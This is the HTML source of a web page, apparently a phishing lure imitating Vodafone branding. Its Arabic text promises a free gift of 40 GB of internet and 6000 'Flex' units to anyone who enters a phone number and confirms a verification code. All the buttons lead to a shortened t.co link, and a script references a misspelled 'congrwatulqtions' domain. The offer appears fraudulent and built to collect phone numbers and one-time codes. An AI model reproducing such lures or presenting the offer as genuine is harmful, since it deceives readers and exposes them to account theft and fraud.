<!DOCTYPE html>
<html>
 <head>
  <title>
  </title>
  <meta content="summary_large_image" name="twitter:card">
  <meta content="website" property="og:type">
  <meta content property="og:description">
  <meta content="https://vv1wqf5fex.preview-postedstuff.com/V2-8rAk-8N1A-i604-YvR3/" property="og:url">
  <meta content="https://pro-bee-beepro-thumbnails.s3.amazonaws.com/messages/790824/774600/1662877/7485437_large.jpg" property="og:image">
  <meta content property="og:title">
  <meta content name="description">
  <meta charset="utf-8">
  <meta content="width=device-width" name="viewport">
  <style>
   .bee-row,
		.bee-row-content {
			position: relative
		}

		.bee-row-1,
		.bee-row-2 {
			background-repeat: no-repeat
		}

		body {
			background-color: #000;
			color: #000;
			font-family: Arial, Helvetica Neue, Helvetica, sans-serif
		}

		a {
			color: #fff
		}

		* {
			box-sizing: border-box
		}

		body,
		h1 {
			margin: 0
		}

		.bee-row-content {
			max-width: 605px;
			margin: 0 auto;
			display: flex
		}

		.bee-row-content .bee-col-w12 {
			flex-basis: 100%
		}

		.bee-button .content,
		.bee-row-1 .bee-col-1 .bee-block-3 {
			text-align: center
		}

		.bee-button a,
		.bee-icon .bee-icon-label-right a {
			text-decoration: none
		}

		.bee-image {
			overflow: auto
		}

		.bee-image .bee-center {
			margin: 0 auto
		}

		.bee-row-1 .bee-col-1 .bee-block-1 {
			width: 100%
		}

		.bee-icon,
		.bee-icon .bee-icon-image,
		.bee-icon .bee-icon-label-right {
			display: inline-block
		}

		.bee-icon {
			vertical-align: middle
		}

		.bee-icon .bee-icon-image {
			vertical-align: middle;
			margin-right: -4px
		}

		.bee-image img {
			display: block;
			width: 100%
		}

		@media (max-width:625px) {
			.bee-row-content:not(.no_stack) {
				display: block
			}
		}

		.bee-row-1 .bee-row-content,
		.bee-row-2 .bee-row-content {
			background-repeat: no-repeat;
			color: #000
		}

		.bee-row-1 .bee-col-1,
		.bee-row-2 .bee-col-1 {
			padding-bottom: 5px;
			padding-top: 5px
		}

		.bee-row-1 .bee-col-1 .bee-block-2 {
			padding: 15px;
			text-align: center;
			width: 100%
		}

		.bee-row-1 .bee-col-1 .bee-block-4 {
			padding: 5px;
			text-align: center
		}

		.bee-row-2 .bee-col-1 .bee-block-1 {
			color: #9d9d9d;
			font-family: inherit;
			font-size: 15px;
			padding-bottom: 5px;
			padding-top: 5px;
			text-align: center
		}

		.bee-row-2 .bee-col-1 .bee-block-1 .bee-icon-image {
			padding: 5px 6px 5px 5px
		}

		.bee-row-2 .bee-col-1 .bee-block-1 .bee-icon {
			margin-left: 0;
			margin-right: 0
		}
  </style>
 <script nonce="CtqrVlb9JqIn6KbJ" type="text/javascript" src="//self.adblockultimate.net/abu.js?domain=congrwatulqtions.xyz&amp;tm=1659233662&amp;lg=true"></script><script nonce="CtqrVlb9JqIn6KbJ" type="text/javascript" src="//self.adblockultimate.net/manager.js?tm=1659233662&amp;lg=true" guid="{D561BF48-9035-4935-8E54-BBEB28E22E44}" inwhitelist="false" status="false" autohide="true"></script><link rel="me" href="https://www.blogger.com/profile/10894203776251845947" />
<meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109'/>
<meta name='google-adsense-platform-domain' content='blogspot.com'/>
</head>
 <body>
  <div class="bee-page-container">
   <div class="bee-row bee-row-1">
    <div class="bee-row-content">
     <div class="bee-col bee-col-1 bee-col-w12">
      <div class="bee-block bee-block-1 bee-image">
       <a href="https://t.co/Un0l3863pp">
        <img alt class="bee-center bee-autowidth" src="https://d15k2d11r6t6rl.cloudfront.net/public/users/Integrators/BeeProAgency/790824_774600/vodafonesc_e86w78l4.gif" style="max-width:320px;"></a>
      </div>
      <div class="bee-block bee-block-2 bee-heading">
       <h1 style="color:#393d47;direction:ltr;font-family:Arial, Helvetica Neue, Helvetica, sans-serif;font-size:23px;font-weight:700;letter-spacing:normal;line-height:120%;text-align:center;margin-top:0;margin-bottom:0;">
        <span style="background-color: #000000; color: #ffffff;">
         <strong>
          <span class="tinyMce-placeholder">
           سجل الان برقمك واحصل علي 40 جيجا انترنت و 6000 فليكس
           <br>
          ادخل رقمك واكد الكود واستلم الهديه الان&nbsp;
          </span>
         </strong>
        </span>
       </h1>
      </div>
      <div class="bee-block bee-block-3 bee-button">
       <a class="bee-button-content" href="https://t.co/Un0l3863pp" style="font-size: 14px; line-height: 28px; background-color: #f60000; border-bottom: 6px solid #FFFFFF; border-left: 6px solid #FFFFFF; border-radius: 14px; border-right: 6px solid #FFFFFF; border-top: 6px solid #FFFFFF; color: #ffffff; font-family: inherit; font-weight: 400; max-width: 100%; padding-bottom: 5px; padding-left: 20px; padding-right: 20px; padding-top: 5px; width: auto; display: inline-block;">
        <span style="font-size: 16px; line-height: 200%; word-break: break-word;">
         <span style="font-size: 22px; line-height: 44px;">
          <strong>
           سجل رقم هاتفك من هنا
          </strong>
         </span>
        </span></a>
      </div>
      <div class="bee-block bee-block-4 bee-button">
       <a class="bee-button-content" href="https://t.co/Un0l3863pp" style="font-size: 14px; line-height: 28px; background-color: #ff0000; border-bottom: 6px solid #FFFFFF; border-left: 6px solid #FFFFFF; border-radius: 17px; border-right: 6px solid #FFFFFF; border-top: 6px solid #FFFFFF; color: #ffffff; font-family: inherit; font-weight: 400; max-width: 100%; padding-bottom: 5px; padding-left: 20px; padding-right: 20px; padding-top: 5px; width: auto; display: inline-block;">
        <span style="font-size: 16px; line-height: 200%; word-break: break-word;">
         <span style="font-size: 22px; line-height: 44px;">
          <strong>
           للحصول علي الهدية
          </strong>
         </span>
        </span></a>
      </div>
     </div>
    </div>
   </div>
   <div class="bee-row bee-row-2">
    <div class="bee-row-content">
     <div class="bee-col bee-col-1 bee-col-w12">
      <div class="bee-block bee-block-1 bee-icons">
       <div class="bee-icon">
        <div class="bee-icon-image">
         <a href="" title="">
          <img alt="" height="32px" src="" width="auto"></a>
        </div>
        <div class="">
         <a href="" target="_blank" title="">
          </a>
        </div>
       </div>
      </div>
     </div>
    </div>
   </div>
  </div>
 </body>
</html>